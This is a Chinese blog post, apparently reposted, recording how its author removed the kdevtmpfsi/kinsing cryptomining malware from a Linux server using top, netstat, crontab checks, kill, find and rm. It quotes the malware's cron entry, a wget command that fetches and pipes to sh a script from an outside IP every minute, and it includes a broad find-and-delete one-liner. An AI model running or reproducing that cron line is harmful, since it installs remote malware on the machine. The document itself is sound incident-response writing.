ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

记录kdevtmpfsi挖矿病毒处理记录和方法

2020-01-02 15:53:09  阅读:801  来源: 互联网

标签:kinsing 记录 ip 3127 kdevtmpfsi 进程 find 挖矿


病毒名称:kdevtmpfsi

状态:CPU爆满,导致线上服务宕机。

图片是盗的,进程占用是真实的。

 

 

 

 

 

 

 

 

1、# top

     查看cpu占用情况,找到占用cpu的进程     最后是  kdevtmpfsi

2、# netstat -natp 

     根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了

此时,挖矿脚本大概率定时在你的crontab里面。

crontab -l ,发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

查看这个进程运行状态

systemctl status 3127

 

systemctl status 3127

 

ps -aux | grep kinsing

 

ps -aux | grep kdevtmpfsi

 

kill  -9   3127

 

cd  /tmp

 

ls

 

 rm -rf kdevtmpfsi 

 

rm -rf /var/tmp/kinsing  记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令

 

find / -name kdevtmpfsi

 

find / -name kinsing

 

进入/var/spool/cron  查看是否有相关的木马定时任务在执行  有的话删掉再重启下crontab

 

后续工作溯源,找到程序漏洞,封禁访问ip,不正常ip。源程序下载。

使用clamav对整个Linux做全盘扫描,确定被感染文件并删除。

 

 查找守护进程文件变种名字。

 

全部删除 

 

find / -name "kinsing*" | xargs rm -rf

 

至此杀毒工作基本进入尾声。后面几天观察服务器服务,进程是否异常。

标签:kinsing,记录,ip,3127,kdevtmpfsi,进程,find,挖矿
来源: https://www.cnblogs.com/llody/p/12133372.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有